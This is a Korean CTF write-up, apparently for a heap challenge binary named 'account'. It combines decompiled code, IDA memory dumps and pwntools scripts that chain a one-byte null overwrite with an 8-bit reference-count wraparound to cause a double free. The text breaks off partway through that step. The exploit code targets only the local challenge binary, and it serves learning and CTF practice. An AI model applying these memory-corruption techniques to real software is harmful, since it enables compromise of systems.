                      \"\"<\/figure>\n\n\n\n
                      group_array[0], 00007FFFF7FFA02A + 0x0<\/code> \ubc14\uc774\ud2b8\uac00 0 \u2192 1\ub85c \ubcc0\uacbd<\/strong><\/p>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      delete_account_from_group (sub_21F0)<\/h3>\n\n\n\n
                      __int64 __fastcall delete_account_from_group(unsigned __int8 group_index, unsigned __int8 account_index)\n{\n  int i; \/\/ [rsp+Ch] [rbp-24h]\n  __int64 account_id; \/\/ [rsp+10h] [rbp-20h]\n  group *v5; \/\/ [rsp+18h] [rbp-18h]\n\n  if ( group_index >= 0x10u )\n    goto LABEL_2;\n  if ( account_index >= 0x10u )\n    goto LABEL_4;\n  v5 = (group *)group_array[group_index];\n  if ( !v5 )\n  {\nLABEL_2:\n    fprintf(stderr, \"invalid group id\\n\");\n    return (unsigned __int8)-1;\n  }\n  if ( !v5->account_count )\n  {\n    fprintf(stderr, \"group is empty\\n\");\n    return (unsigned __int8)-1;\n  }\n  account_id = account_id_array[account_index];\n  if ( !account_id )\n  {\nLABEL_4:\n    fprintf(stderr, \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n  for ( i = 0; i < 16; ++i )\n  {\n    if ( *((_QWORD *)v5->group_data + i) == account_id )\n    {\n      *((_QWORD *)v5->group_data + i) = 0;\n      --v5->account_count;\n      sub_1390(account_index);\n      return 0;\n    }\n  }\n  fprintf(stderr, \"account is not in the group\\n\");\n  return (unsigned __int8)-1;\n}\n\n__int64 __fastcall sub_1390(unsigned __int8 a1)\n{\n  __int64 v2; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( a1 < 0x10u && (v2 = account_id_array[a1]) != 0 )\n  {\n    if ( !--*(_BYTE *)(v2 + 1) )\n    {\n      sub_2840(*(_QWORD *)(v2 + 8));\n      sub_2840(v2);\n    }\n    return *(unsigned __int8 *)(v2 + 1);\n  }\n  else\n  {\n    fprintf(stderr, \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n}\n\n__int64 __fastcall sub_2840(__int64 a1)\n{\n  __int64 i; \/\/ [rsp+10h] [rbp-20h]\n\n  for ( i = *(_QWORD *)(qword_6150 + 16); i; i = *(_QWORD *)(i + 16) )\n  {\n    if ( *(_QWORD *)(i + 8) == a1 )\n    {\n      *(_BYTE *)i = 2;\n      return 0;\n    }\n  }\n  fprintf(stderr, \"invalid ptr\\n\");\n  return (unsigned int)-1;\n}<\/pre>\n\n\n\n
                      from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef add_account_to_group(group_index, account_index):\n    _menu = b\"\\x12\"\n    \n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef delete_account_from_group(group_index, account_index):\n    _menu = b\"\\x13\"\n\n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\naccount_index = make_account(b\"A\"*16)\ninfo(f\"make_account _index: {account_index}\")\n\ngroup_index = make_group()\ninfo(f\"make_group _index: {group_index}\")\n\nr = add_account_to_group(account_index, group_index)\ninfo(f\"add_account_to_group r: {r}\")\n\nr = delete_account_from_group(account_index, group_index)\ninfo(f\"delete_account_from_group r: {r}\")\n\np.interactive()<\/pre>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      00007FFFF7FFA000 + 0x1<\/code> \ubc14\uc774\ud2b8\uac00 2 \u2192 1\ub85c \ubcc0\uacbd<\/strong><\/p>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      00007FFFF7FFA02A + 0x0<\/code> \ubc14\uc774\ud2b8\uac00 1 \u2192 0\uc73c\ub85c \ubcc0\uacbd<\/strong><\/p>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      list_group (sub_23E0)<\/h3>\n\n\n\n
                        \n
                      • b\u201d\\x14\u201d<\/code><\/li>\n\n\n\n
                      • make_account<\/code> \u2192 make_group<\/code> \u2192 add_account_to_group<\/code> \u2192 list_group<\/code>\n
                          \n
                        • account_data \ucd9c\ub825.<\/li>\n\n\n\n
                        • \uc131\uacf5\uc2dc 0, \uc2e4\ud328\uc2dc -1 \ub9ac\ud134.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
                          __int64 __fastcall list_group(unsigned __int8 group_index)\n{\n  int i; \/\/ [rsp+4h] [rbp-1Ch]\n  group *v3; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( group_index < 0x10u && (v3 = (group *)group_array[group_index]) != 0 )\n  {\n    if ( v3->account_count )\n    {\n      for ( i = 0; i < 16; ++i )\n      {\n        if ( *((_QWORD *)v3->group_data + i) )\n          sub_1860(*((_QWORD *)v3->group_data + i));\n      }\n      return 0;\n    }\n    else\n    {\n      fprintf(stderr, \"group is empty\\n\");\n      return (unsigned int)-1;\n    }\n  }\n  else\n  {\n    fprintf(stderr, \"invalid group id\\n\");\n    return (unsigned int)-1;\n  }\n}\n\n__int64 __fastcall sub_1860(__int64 a1)\n{\n  bool v2; \/\/ [rsp+Bh] [rbp-25h]\n  int j; \/\/ [rsp+10h] [rbp-20h]\n  int i; \/\/ [rsp+14h] [rbp-1Ch]\n\n  if ( a1 )\n  {\n    if ( *(_BYTE *)a1 )\n    {\n      if ( *(_BYTE *)a1 != 1 )\n      {\n        fprintf(stderr, \"unexpected\\n\");\n        return (unsigned int)-1;\n      }\n      for ( i = 0; *(_BYTE *)(*(_QWORD *)(a1 + 8) + i); ++i )\n        printf(\"%c\", (unsigned int)*(char *)(*(_QWORD *)(a1 + 8) + i));\n    }\n    else\n    {\n      for ( j = 0; ; j += 2 )\n      {\n        v2 = 1;\n        if ( !*(_BYTE *)(*(_QWORD *)(a1 + 8) + j) )\n          v2 = *(_BYTE *)(*(_QWORD *)(a1 + 8) + j + 1) != 0;\n        if ( !v2 )\n          break;\n        printf(\n          \"%c%c\",\n          (unsigned int)*(char *)(*(_QWORD *)(a1 + 8) + j),\n          (unsigned int)*(char *)(*(_QWORD *)(a1 + 8) + j + 1));\n      }\n    }\n    return 0;\n  }\n  fprintf(stderr, \"invalid account id\\n\");\n  return (unsigned int)-1;\n}<\/pre>\n\n\n\n
                          from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\ndef delete_account(index):\n    _menu = b\"\\x01\"\n    _index = index\n    payload = _menu + _index\n\n    p.send(payload)\n    return p.recv(1)\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef add_account_to_group(group_index, account_index):\n    _menu = b\"\\x12\"\n    \n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef list_group(group_index):\n    p.send(b\"\\x14\" + group_index)\n    return p.recv()\n\naccount_index = make_account(b\"A\"*16)\ninfo(f\"make_account _index: {account_index}\")\n\ngroup_index = make_group()\ninfo(f\"make_group _index: {group_index}\")\n\nr = add_account_to_group(account_index, group_index)\ninfo(f\"add_account_to_group r: {r}\")\n\nr = list_group(group_index)\ninfo(f\"list_group r: {r}\")\n\nr = delete_account_from_group(account_index, group_index)\ninfo(f\"delete_account_from_group r: {r}\")\n\nr = list_group(group_index)\ninfo(f\"list_group r: {r}\")\n\np.interactive()<\/pre>\n\n\n\n
                          [DEBUG] Sent 0x13 bytes:\n    00000000  00 01 41 41  41 41 41 41  41 41 41 41  41 41 41 41  \u2502\u00b7\u00b7AA\u2502AAAA\u2502AAAA\u2502AAAA\u2502\n    00000010  41 41 0a                                            \u2502AA\u00b7\u2502\n    00000013\n[DEBUG] Received 0x1 bytes:\n    b'\\x00'\n[*] make_account _index: b'\\x00'\n[DEBUG] Sent 0x1 bytes:\n    b'\\x10'\n[DEBUG] Received 0x1 bytes:\n    b'\\x00'\n[*] make_group _index: b'\\x00'\n[DEBUG] Sent 0x3 bytes:\n    00000000  12 00 00                                            \u2502\u00b7\u00b7\u00b7\u2502\n    00000003\n[DEBUG] Received 0x1 bytes:\n    b'\\x00'\n[*] add_account_to_group r: b'\\x00'\n[DEBUG] Sent 0x2 bytes:\n    00000000  14 00                                               \u2502\u00b7\u00b7\u2502\n    00000002\n[DEBUG] Received 0x12 bytes:\n    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  \u2502AAAA\u2502AAAA\u2502AAAA\u2502AAAA\u2502\n    00000010  0a 00                                               \u2502\u00b7\u00b7\u2502\n    00000012<\/pre>\n\n\n\n
                          Solution<\/h1>\n\n\n\n
                          1. \uba3c\uc800 16\ubc14\uc774\ud2b8 \ub370\uc774\ud130\uc640 \ud568\uacc4 \uacc4\uc815\uc744 3\ubc88 \uc0dd\uc131<\/h3>\n\n\n\n
                          Code:<\/strong><\/p>\n\n\n\n
                          from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account', checksec=False)\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\ndef delete_account(index):\n    _menu = b\"\\x01\"\n    _index = index\n    payload = _menu + _index\n\n    p.send(payload)\n    return p.recv(1)\n\ndef modify_account_Data(is_utf8_type, account_index, data):\n    _menu = b\"\\x02\"\n    if(is_utf8_type):\n        _is_utf8_type = b\"\\x01\"\n    else:\n        _is_utf8_type = b\"\\x00\"\n    payload = _menu + account_index + _is_utf8_type + data\n    \n    p.send(payload)\n    r = p.recv(len(data))\n    info(f\"modify_account_Data r: {r}\")\n    return p.recv()\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef delete_group(group_index):\n    _menu = b\"\\x11\"\n\n    p.send(_menu + group_index)\n    return p.recv(1)\n\ndef add_account_to_group(group_index, account_index):\n    _menu = b\"\\x12\"\n    \n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef delete_account_from_group(group_index, account_index):\n    _menu = b\"\\x13\"\n\n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef list_group(group_index):\n    p.send(b\"\\x14\" + group_index)\n    return p.recv()\n\naccount_index = make_account(b\"A\"*16)\ninfo(f\"make_account _index: {account_index}\")\n\naccount_index = make_account(b\"B\"*16)\ninfo(f\"make_account _index: {account_index}\")\n\naccount_index = make_account(b\"C\"*16)\ninfo(f\"make_account _index: {account_index}\")\n\n\n\np.interactive()<\/pre>\n\n\n\n
                          Result:<\/strong><\/p>\n\n\n\n
                          ubuntu@2d0f4d9a440c:~\/hto2024\/account$ python3 solve.py \n[+] Starting local process '.\/account': pid 815\n[*] make_account _index: b'\\x00'\n[*] make_account _index: b'\\x01'\n[*] make_account _index: b'\\x02'\n[*] Switching to interactive mode<\/pre>\n\n\n\n
                          account_id_array<\/code>\uc5d0 3\uac1c\uc758 account_id<\/code> \uc874\uc7ac.<\/p>\n\n\n\n
                          7FFFF7FFA000<\/code>, 7FFFF7FFA02A<\/code>, 7FFFF7FFA054<\/code><\/p>\n\n\n\n
                          \"\"<\/figure>\n\n\n\n
                          account_id<\/code> \ub0b4\uc6a9\ub4e4<\/p>\n\n\n\n
                          \"\"<\/figure>\n\n\n\n
                          MEMORY:00007FFFF7FFA000 dq offset unk_101\nMEMORY:00007FFFF7FFA008 dq offset off_7FFFF7FFA018\nMEMORY:00007FFFF7FFA010 dq 0\nMEMORY:00007FFFF7FFA018 off_7FFFF7FFA018 dq offset unk_4141414141414141\nMEMORY:00007FFFF7FFA018                                         ; DATA XREF: MEMORY:00007FFFF7FFA008\u2191o\nMEMORY:00007FFFF7FFA020 dq offset unk_4141414141414141\nMEMORY:00007FFFF7FFA028 db  0Ah\nMEMORY:00007FFFF7FFA029 db    0\nMEMORY:00007FFFF7FFA02A dq offset unk_101\nMEMORY:00007FFFF7FFA032 dq offset off_7FFFF7FFA042\nMEMORY:00007FFFF7FFA03A dq 0\nMEMORY:00007FFFF7FFA042 off_7FFFF7FFA042 dq offset unk_4242424242424242\nMEMORY:00007FFFF7FFA042                                         ; DATA XREF: MEMORY:00007FFFF7FFA032\u2191o\nMEMORY:00007FFFF7FFA04A dq offset unk_4242424242424242\nMEMORY:00007FFFF7FFA052 db  0Ah\nMEMORY:00007FFFF7FFA053 db    0\nMEMORY:00007FFFF7FFA054 dq offset unk_101\nMEMORY:00007FFFF7FFA05C dq offset off_7FFFF7FFA06C\nMEMORY:00007FFFF7FFA064 dq 0\nMEMORY:00007FFFF7FFA06C off_7FFFF7FFA06C dq offset unk_4343434343434343\nMEMORY:00007FFFF7FFA06C                                         ; DATA XREF: MEMORY:00007FFFF7FFA05C\u2191o\nMEMORY:00007FFFF7FFA074 dq offset unk_4343434343434343\nMEMORY:00007FFFF7FFA07C db  0Ah\nMEMORY:00007FFFF7FFA07D db    0<\/pre>\n\n\n\n
                          delete_group<\/code> \uc758 \uacbd\uc6b0: _group->account_count == 0<\/code>\uc77c\ub54c, 
                          delete_account<\/code>\uc758 \uacbd\uc6b0: _account->count == 0<\/code> \uc77c\ub54c, 
                          delete_account_from_group<\/code>\uc758 \uacbd\uc6b0: _account->count == 0<\/code>\uc77c\ub54c, 
                          free \ub428.<\/p>\n\n\n\n
                          \ub05d\uc5d0 \\x00 1\ubc14\uc774\ud2b8 \ub36e\ub294 \ubc84\uadf8 \ud65c\uc6a9\ud558\uc5ec group\uc758 account_count\ub97c 0\uc73c\ub85c \ub9cc\ub4e4\uae30<\/h3>\n\n\n\n
                          \uacc4\uc815 3\uac1c \ub9cc\ub4e4\uace0, \uadf8\ub8f9 1\uac1c \ub9cc\ub4e4\uace0, 2\ubc88\uc9f8 \uacc4\uc815\uc744 \uadf8\ub8f9\uc5d0 \ub123\uc744 \uacbd\uc6b0:<\/strong><\/p>\n\n\n\n
                          MEMORY:00007FFFF7FFA000 db 1\nMEMORY:00007FFFF7FFA001 db 1\nMEMORY:00007FFFF7FFA002 db    0\nMEMORY:00007FFFF7FFA003 db    0\nMEMORY:00007FFFF7FFA004 db    0\nMEMORY:00007FFFF7FFA005 db    0\nMEMORY:00007FFFF7FFA006 db    0\nMEMORY:00007FFFF7FFA007 db    0\nMEMORY:00007FFFF7FFA008 dq offset off_7FFFF7FFA018\nMEMORY:00007FFFF7FFA010 dq 0\nMEMORY:00007FFFF7FFA018 off_7FFFF7FFA018 dq offset unk_4141414141414141\nMEMORY:00007FFFF7FFA018                                         ; DATA XREF: MEMORY:00007FFFF7FFA008\u2191o\nMEMORY:00007FFFF7FFA020 db    0\nMEMORY:00007FFFF7FFA021 byte_7FFFF7FFA021 db 1                  ; DATA XREF: MEMORY:off_7FFFF7FFA07B\u2193o\nMEMORY:00007FFFF7FFA022 db 2\nMEMORY:00007FFFF7FFA023 db    0\nMEMORY:00007FFFF7FFA024 db    0\nMEMORY:00007FFFF7FFA025 db    0\nMEMORY:00007FFFF7FFA026 db    0\nMEMORY:00007FFFF7FFA027 db    0\nMEMORY:00007FFFF7FFA028 db    0\nMEMORY:00007FFFF7FFA029 dq offset off_7FFFF7FFA039\nMEMORY:00007FFFF7FFA031 db    0\nMEMORY:00007FFFF7FFA032 db    0\nMEMORY:00007FFFF7FFA033 db    0\nMEMORY:00007FFFF7FFA034 db    0\nMEMORY:00007FFFF7FFA035 db    0\nMEMORY:00007FFFF7FFA036 db    0\nMEMORY:00007FFFF7FFA037 db    0\nMEMORY:00007FFFF7FFA038 db    0\nMEMORY:00007FFFF7FFA039 off_7FFFF7FFA039 dq offset unk_4242424242424242\nMEMORY:00007FFFF7FFA039                                         ; DATA XREF: MEMORY:00007FFFF7FFA029\u2191o\nMEMORY:00007FFFF7FFA041 db    0\nMEMORY:00007FFFF7FFA042 db 1\nMEMORY:00007FFFF7FFA043 db 1\nMEMORY:00007FFFF7FFA044 db    0\nMEMORY:00007FFFF7FFA045 db    0\nMEMORY:00007FFFF7FFA046 db    0\nMEMORY:00007FFFF7FFA047 db    0\nMEMORY:00007FFFF7FFA048 db    0\nMEMORY:00007FFFF7FFA049 db    0\nMEMORY:00007FFFF7FFA04A dq offset off_7FFFF7FFA05A\nMEMORY:00007FFFF7FFA052 dq 0\nMEMORY:00007FFFF7FFA05A off_7FFFF7FFA05A dq offset unk_4343434343434343\nMEMORY:00007FFFF7FFA05A                                         ; DATA XREF: MEMORY:00007FFFF7FFA04A\u2191o\nMEMORY:00007FFFF7FFA062 db    0\nMEMORY:00007FFFF7FFA063 db 1\nMEMORY:00007FFFF7FFA064 db 0\nMEMORY:00007FFFF7FFA065 db    0\nMEMORY:00007FFFF7FFA066 db    0\nMEMORY:00007FFFF7FFA067 db    0\nMEMORY:00007FFFF7FFA068 db    0\nMEMORY:00007FFFF7FFA069 db    0\nMEMORY:00007FFFF7FFA06A db    0\nMEMORY:00007FFFF7FFA06B dq offset off_7FFFF7FFA07B\nMEMORY:00007FFFF7FFA073 dq offset group_vtable\nMEMORY:00007FFFF7FFA07B off_7FFFF7FFA07B dq offset byte_7FFFF7FFA021\nMEMORY:00007FFFF7FFA07B                                         ; DATA XREF: MEMORY:00007FFFF7FFA06B\u2191o\nMEMORY:00007FFFF7FFA083 db    0\nMEMORY:00007FFFF7FFA084 db    0\nMEMORY:00007FFFF7FFA085 db    0\nMEMORY:00007FFFF7FFA086 db    0\nMEMORY:00007FFFF7FFA087 db    0\nMEMORY:00007FFFF7FFA088 db    0\nMEMORY:00007FFFF7FFA089 db    0\nMEMORY:00007FFFF7FFA08A db    0\nMEMORY:00007FFFF7FFA08B db    0\nMEMORY:00007FFFF7FFA08C db    0\nMEMORY:00007FFFF7FFA08D db    0\nMEMORY:00007FFFF7FFA08E db    0\nMEMORY:00007FFFF7FFA08F db    0\nMEMORY:00007FFFF7FFA090 db    0<\/pre>\n\n\n\n
                          \uc5ec\uae30\uc11c modify_account_data(False, b\"\\x01\", b\"D\"*8)<\/code><\/strong> \uc218\ud589\ud560 \uacbd\uc6b0:<\/p>\n\n\n\n
                            \n
                          • 2\ubc88\uc9f8 \uc778\ub371\uc2a4 account\uc758 is_utf8_type<\/code> 1\ubc14\uc774\ud2b8 \ud544\ub4dc\uac00 0\uc73c\ub85c \ub36e\uc5b4\uc368\uc9c4\ub2e4.<\/li>\n<\/ul>\n\n\n\n
                            MEMORY:00007FFFF7FFA000 db 1\nMEMORY:00007FFFF7FFA001 db 1\nMEMORY:00007FFFF7FFA002 db    0\nMEMORY:00007FFFF7FFA003 db    0\nMEMORY:00007FFFF7FFA004 db    0\nMEMORY:00007FFFF7FFA005 db    0\nMEMORY:00007FFFF7FFA006 db    0\nMEMORY:00007FFFF7FFA007 db    0\nMEMORY:00007FFFF7FFA008 dq offset off_7FFFF7FFA018\nMEMORY:00007FFFF7FFA010 dq 0\nMEMORY:00007FFFF7FFA018 off_7FFFF7FFA018 dq offset unk_4141414141414141\nMEMORY:00007FFFF7FFA018                                         ; DATA XREF: MEMORY:00007FFFF7FFA008\u2191o\nMEMORY:00007FFFF7FFA020 db    0\nMEMORY:00007FFFF7FFA021 byte_7FFFF7FFA021 db 0                  ; DATA XREF: MEMORY:off_7FFFF7FFA07B\u2193o\nMEMORY:00007FFFF7FFA022 db 2\nMEMORY:00007FFFF7FFA023 db    0\nMEMORY:00007FFFF7FFA024 db    0\nMEMORY:00007FFFF7FFA025 db    0\nMEMORY:00007FFFF7FFA026 db    0\nMEMORY:00007FFFF7FFA027 db    0\nMEMORY:00007FFFF7FFA028 db    0\nMEMORY:00007FFFF7FFA029 dq offset off_7FFFF7FFA039\nMEMORY:00007FFFF7FFA031 dq 0\nMEMORY:00007FFFF7FFA039 off_7FFFF7FFA039 dq offset unk_4444444444444444\nMEMORY:00007FFFF7FFA039                                         ; DATA XREF: MEMORY:00007FFFF7FFA029\u2191o\nMEMORY:00007FFFF7FFA041 db    0\nMEMORY:00007FFFF7FFA042 db 0\nMEMORY:00007FFFF7FFA043 db 1\nMEMORY:00007FFFF7FFA044 db    0\nMEMORY:00007FFFF7FFA045 db    0\nMEMORY:00007FFFF7FFA046 db    0\nMEMORY:00007FFFF7FFA047 db    0\nMEMORY:00007FFFF7FFA048 db    0\nMEMORY:00007FFFF7FFA049 db    0\nMEMORY:00007FFFF7FFA04A dq offset off_7FFFF7FFA05A\nMEMORY:00007FFFF7FFA052 dq 0\nMEMORY:00007FFFF7FFA05A off_7FFFF7FFA05A dq offset unk_4343434343434343\nMEMORY:00007FFFF7FFA05A                                         ; DATA XREF: MEMORY:00007FFFF7FFA04A\u2191o\nMEMORY:00007FFFF7FFA062 db    0\nMEMORY:00007FFFF7FFA063 db 1\nMEMORY:00007FFFF7FFA064 db 0\nMEMORY:00007FFFF7FFA065 db    0\nMEMORY:00007FFFF7FFA066 db    0\nMEMORY:00007FFFF7FFA067 db    0\nMEMORY:00007FFFF7FFA068 db    0\nMEMORY:00007FFFF7FFA069 db    0\nMEMORY:00007FFFF7FFA06A db    0\nMEMORY:00007FFFF7FFA06B dq offset off_7FFFF7FFA07B\nMEMORY:00007FFFF7FFA073 dq offset group_vtable\nMEMORY:00007FFFF7FFA07B off_7FFFF7FFA07B dq offset byte_7FFFF7FFA021\nMEMORY:00007FFFF7FFA07B                                         ; DATA XREF: MEMORY:00007FFFF7FFA06B\u2191o\nMEMORY:00007FFFF7FFA083 db    0\nMEMORY:00007FFFF7FFA084 db    0\nMEMORY:00007FFFF7FFA085 db    0\nMEMORY:00007FFFF7FFA086 db    0\nMEMORY:00007FFFF7FFA087 db    0\nMEMORY:00007FFFF7FFA088 db    0\nMEMORY:00007FFFF7FFA089 db    0\nMEMORY:00007FFFF7FFA08A db    0\nMEMORY:00007FFFF7FFA08B db    0\nMEMORY:00007FFFF7FFA08C db    0\nMEMORY:00007FFFF7FFA08D db    0\nMEMORY:00007FFFF7FFA08E db    0\nMEMORY:00007FFFF7FFA08F db    0\nMEMORY:00007FFFF7FFA090 db    0<\/pre>\n\n\n\n
                            2\ubc88\uca30 account \uadf8 \ub4a4\uc5d0\ub294 group \uad6c\uc870\uccb4 \ud544\ub4dc\ub4e4\uc774 \uc800\uc7a5\ub418\uc788\ub2e4.<\/p>\n\n\n\n
                            group \uad6c\uc870\uccb4\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n
                            struct group \/\/ sizeof=0x18\n{\n    _DWORD account_count;\n    _BYTE gap0[4];\n    void *account_array;\n    group_vtable *_group_vtable;\n};<\/pre>\n\n\n\n
                            modify_account_data<\/code> \ub97c \ud1b5\ud574 \ub9c8\ucc2c\uac00\uc9c0\ub85c \\x00 \ub36e\uc5b4\uc368\uc9c0\ub294 1\ubc14\uc774\ud2b8 \ubc84\uadf8\ub85c account_count<\/code> \ud544\ub4dc \uc911 \ud558\uc704 \ubc14\uc774\ud2b8\ub97c 0\uc73c\ub85c \ub36e\uc744 \uc218 \uc788\uae30\uc5d0,<\/p>\n\n\n\n
                            group\uc5d0 account\uac00 \uc788\ub354\ub77c\ub3c4, delete_group<\/code> \ud568\uc218\ub97c \ud638\ucd9c \ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
                            add_account_to_group<\/code> \ub97c \ud638\ucd9c\ud560\ub54c, \ub0b4\ubd80\uc801\uc73c\ub85c add_account_to_group<\/code> \ud568\uc218\ub97c \ud638\ucd9c\ud55c\ub2e4.<\/strong><\/p>\n\n\n\n
                            __int64 __fastcall increase_account_count(unsigned __int8 account_index)\n{\n  account *_account; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( account_index < 0x10u && (_account = (account *)account_id_array[account_index]) != 0 )\n  {\n    return ++_account->count;\n  }\n  else\n  {\n    fprintf(MEMORY[0x7FFFF7FAD860], \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n}<\/pre>\n\n\n\n
                            account \uad6c\uc870\uccb4\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n
                            struct account \/\/ sizeof=0x10\n{\n    BOOL is_utf8_type;\n    unsigned __int8 count;\n    \/\/ padding byte\n    \/\/ padding byte\n    \/\/ padding byte\n    \/\/ padding byte\n    \/\/ padding byte\n    \/\/ padding byte\n    _QWORD qword8;\n};<\/pre>\n\n\n\n
                            \ubc84\uadf8\ub85c \uc544\ub798 \uacfc\uc815\uc744 5\ubc88 \uc218\ud589\ud588\uc744\ub54c 
                            make_group()<\/code> 
                            \u2192 add_account_to_group(group_index, b\"\\x01\")<\/code> 
                            \u2192 modify_account_data(False, b\"\\x02\", b\"D\"*8)<\/code> 
                            \u2192 delete_group(b\"\\x00\")<\/code><\/p>\n\n\n\n
                            count\ub97c \uacc4\uc18d \uc99d\uac00\uc2dc\ucf1c 0xff<\/code> \uc5d0\uc11c \ub354 \uc99d\uac00\uc2dc\ud0a4\uba74, 
                            1\ubc88\uca30 \uc778\ub371\uc2a4\uc758 account\uc758 count<\/code> \ud544\ub4dc\ub97c \ub2e4\uc2dc 0\uc73c\ub85c \ub9cc\ub4e4\uc5b4\uc904 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
                            from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account', checksec=False)\n\ndef make_account(is_utf8_type, data):\n    _menu = b\"\\x00\"\n    if(is_utf8_type):\n        _is_utf8_type = b\"\\x01\"\n    else:\n        _is_utf8_type = b\"\\x00\"\n    _data = data\n    payload = _menu + _is_utf8_type + _data\n\n    p.send(payload)\n    return p.recv(1)\n\ndef delete_account(index):\n    _menu = b\"\\x01\"\n    _index = index\n    payload = _menu + _index\n\n    p.send(payload)\n    return p.recv(1)\n\ndef modify_account_data(is_utf8_type, account_index, data):\n    _menu = b\"\\x02\"\n    if(is_utf8_type):\n        _is_utf8_type = b\"\\x01\"\n    else:\n        _is_utf8_type = b\"\\x00\"\n    payload = _menu + account_index + _is_utf8_type + data\n    \n    p.send(payload)\n    r = p.recv(len(data))\n    info(f\"modify_account_Data r: {r}\")\n    return p.recv()\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef delete_group(group_index):\n    _menu = b\"\\x11\"\n\n    p.send(_menu + group_index)\n    return p.recv(1)\n\ndef add_account_to_group(group_index, account_index):\n    _menu = b\"\\x12\"\n    \n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef delete_account_from_group(group_index, account_index):\n    _menu = b\"\\x13\"\n\n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef list_group(group_index):\n    p.send(b\"\\x14\" + group_index)\n    return p.recv()\n\naccount_index = make_account(True, b\"A\"*8)   #0\ninfo(f\"make_account _index: {account_index}\")\n\naccount_index = make_account(True, b\"B\"*8)   #1\ninfo(f\"make_account _index: {account_index}\")\n\naccount_index = make_account(True, b\"C\"*8)   #2\ninfo(f\"make_account _index: {account_index}\")\n\nfor i in range(0xff-1):\n    group_index = make_group()    #0\n    info(f\"group_index _index: {group_index}\")\n    add_account_to_group(group_index, b\"\\x01\")  #(group_id, account_id)\n\n    # pause()\n    modify_account_data(False, b\"\\x02\", b\"D\"*8)\n\n    # delete_account_from_group(b\"\\x00\", b\"\\x01\")  #(group_id, account_id)\n    delete_group(b\"\\x00\")<\/pre>\n\n\n\n
                            0xff<\/code>\ubc88 \uc218\ud589\ud588\uc744\ub54c, 1\ubc88\uc9f8 \uc778\ub371\uc2a4\uc758 account\uc758 count<\/code> \ud544\ub4dc\uac12\uc774 0\uc73c\ub85c \ub428.<\/p>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            delete_account_from_group<\/code>\uc744 \ud1b5\ud55c free \uc2dc\ub3c4.<\/h3>\n\n\n\n
                            # ...\ngroup_index = make_group()    #0\ninfo(f\"group_index _index: {group_index}\")\nadd_account_to_group(group_index, b\"\\x01\")  #(group_id, account_id)\n# \uc5ec\uae30\uae4c\uc9c0 \ud588\uc744\ub54c, 1\ubc88\uca30 \uc778\ub371\uc2a4 account\uc758 count \ud544\ub4dc\uac12\uc740 1\uc774 \ub428.\n\ndelete_account_from_group(group_index, b\"\\x01\") #group, account\n#Free \ub428.<\/pre>\n\n\n\n
                            delete_account_from_group<\/code> \uc218\ud589\uc804 – 0\ubc88\uc9f8 \uc778\ub371\uc2a4 group:<\/p>\n\n\n\n
                            account_array[0]<\/code>\uc740 1\ubc88\uc9f8 \uc778\ub371\uc2a4\uc758 account<\/code>\ub97c \uac00\ub9ac\ud0b4.<\/p>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            delete_account_from_group<\/code> \uc218\ud589\ud6c4 – 0\ubc88\uc9f8 \uc778\ub371\uc2a4 group:<\/p>\n\n\n\n
                              \n
                            • \ub0b4\ubd80\uc801\uc73c\ub85c free_account_id \uc218\ud589<\/li>\n\n\n\n
                            • 2\ubc88\uc758<\/strong> free\ub97c \uc218\ud589\ud568\n
                                \n
                              • free_func((__int64)_account->account_data);<\/code><\/strong><\/li>\n\n\n\n
